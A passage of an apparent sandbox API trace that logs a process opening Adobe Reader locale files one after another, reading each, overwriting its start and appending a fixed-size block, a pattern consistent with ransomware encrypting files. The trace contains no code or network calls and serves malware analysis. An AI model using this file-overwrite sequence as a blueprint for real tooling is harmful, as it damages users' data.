dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x13600 [0081.380] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.380] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.380] ReleaseMutex (hMutex=0x168) returned 1 [0081.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.SKY", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0081.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.SKY", cchWideChar=14, lpMultiByteStr=0x1f7362c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.SKY", lpUsedDefaultChar=0x0) returned 14 [0081.381] ReadFile (in: hFile=0x1ec, lpBuffer=0x2870cb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2870cb8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0081.896] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x12600 [0081.896] ReadFile (in: hFile=0x1ec, lpBuffer=0x2696e18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2696e18*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.897] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x12600 [0081.898] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.898] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0081.898] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.898] CloseHandle (hObject=0x1ec) returned 1 [0081.899] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\SendMail.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\sendmail.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0081.899] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.899] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3c00 [0081.899] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.900] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.900] ReleaseMutex (hMutex=0x168) returned 1 [0081.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.SKY", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.SKY", cchWideChar=12, lpMultiByteStr=0x1f7360c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.SKY", lpUsedDefaultChar=0x0) returned 12 [0081.900] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.902] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2c00 [0081.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.903] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2c00 [0081.903] WriteFile (in: hFile=0x1ec, lpBuffer=0x2696718*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.904] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0081.904] WriteFile (in: hFile=0x1ec, lpBuffer=0x2696718*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.904] CloseHandle (hObject=0x1ec) returned 1 [0081.905] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\AdobeCollabSync.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\adobecollabsync.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0081.905] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.905] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1a00 [0081.905] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.906] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.906] ReleaseMutex (hMutex=0x168) returned 1 [0081.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.SLV", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0081.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.SLV", cchWideChar=19, lpMultiByteStr=0x1f88b2c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.SLV", lpUsedDefaultChar=0x0) returned 19 [0081.906] ReadFile (in: hFile=0x1ec, lpBuffer=0x2696718, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesRead=0x311f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0081.908] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0081.908] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x311f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0081.908] CloseHandle (hObject=0x1ec) returned 1 [0081.908] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\IA32.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\ia32.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0081.909] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.909] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe00 [0081.909] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.909] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.909] ReleaseMutex (hMutex=0x168) returned 1 [0081.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.SLV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0081.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.SLV", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.SLV", lpUsedDefaultChar=0x0) returned 8 [0081.909] ReadFile (in: hFile=0x1ec, lpBuffer=0x2696718, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesRead=0x311f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0081.911] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0081.911] WriteFile (in: hFile=0x1ec, lpBuffer=0x2696718*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesWritten=0x311f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0081.912] CloseHandle (hObject=0x1ec) returned 1 [0081.912] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\SaveAsRTF.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\saveasrtf.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0081.912] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.913] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4800 [0081.913] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.913] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.913] ReleaseMutex (hMutex=0x168) returned 1 [0081.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.SLV", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.SLV", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.SLV", lpUsedDefaultChar=0x0) returned 13 [0081.913] ReadFile (in: hFile=0x1ec, lpBuffer=0x2696718, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.915] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3800 [0081.915] ReadFile (in: hFile=0x1ec, lpBuffer=0x2696718, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.916] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3800 [0081.916] WriteFile (in: hFile=0x1ec, lpBuffer=0x2696718*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.916] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0081.916] WriteFile (in: hFile=0x1ec, lpBuffer=0x2696718*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.916] CloseHandle (hObject=0x1ec) returned 1 [0081.917] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\accessibility.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\accessibility.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0081.917] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.917] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa400 [0081.918] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.918] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.918] ReleaseMutex (hMutex=0x168) returned 1 [0081.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.SVE", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0081.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.SVE", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.SVE", lpUsedDefaultChar=0x0) returned 17 [0081.918] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0081.920] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x9400 [0081.920] ReadFile (in: hFile=0x1ec, lpBuffer=0x2696718, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.921] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x9400 [0081.921] WriteFile (in: hFile=0x1ec, lpBuffer=0x2696718*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.922] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0081.922] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.922] CloseHandle (hObject=0x1ec) returned 1 [0081.922] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\eBook.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\ebook.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0081.923] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.923] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1a00 [0081.923] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.923] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.923] ReleaseMutex (hMutex=0x168) returned 1 [0081.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.SVE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0081.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.SVE", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.SVE", lpUsedDefaultChar=0x0) returned 9 [0081.923] ReadFile (in: hFile=0x1ec, lpBuffer=0x2696718, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesRead=0x311f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0081.925] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0081.925] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea5e88*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea5e88*, lpNumberOfBytesWritten=0x311f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0081.925] CloseHandle (hObject=0x1ec) returned 1 [0081.926] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\ReadOutLoud.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\readoutloud.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0081.926] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.926] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2a00 [0081.926] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.926] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.927] ReleaseMutex (hMutex=0x168) returned 1 [0081.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.SVE", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0081.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.SVE", cchWideChar=15, lpMultiByteStr=0x1f7346c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.SVE", lpUsedDefaultChar=0x0) returned 15 [0081.927] ReadFile (in: hFile=0x1ec, lpBuffer=0x2696718, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.928] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1a00 [0081.929] ReadFile (in: hFile=0x1ec, lpBuffer=0x2696718, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.929] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1a00 [0081.930] WriteFile (in: hFile=0x1ec, lpBuffer=0x2696718*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.930] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0081.930] WriteFile (in: hFile=0x1ec, lpBuffer=0x2696718*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.930] CloseHandle (hObject=0x1ec) returned 1 [0081.930] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\updater.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\updater.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0081.931] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.931] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2800 [0081.931] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0081.931] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.931] ReleaseMutex (hMutex=0x168) returned 1 [0081.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.SVE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0081.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.SVE", cchWideChar=11, lpMultiByteStr=0x1f7360c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.SVE", lpUsedDefaultChar=0x0) returned 11 [0081.931] ReadFile (in: hFile=0x1ec, lpBuffer=0x2696718, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.933] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1800 [0081.933] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.934] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1800 [0081.934] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, 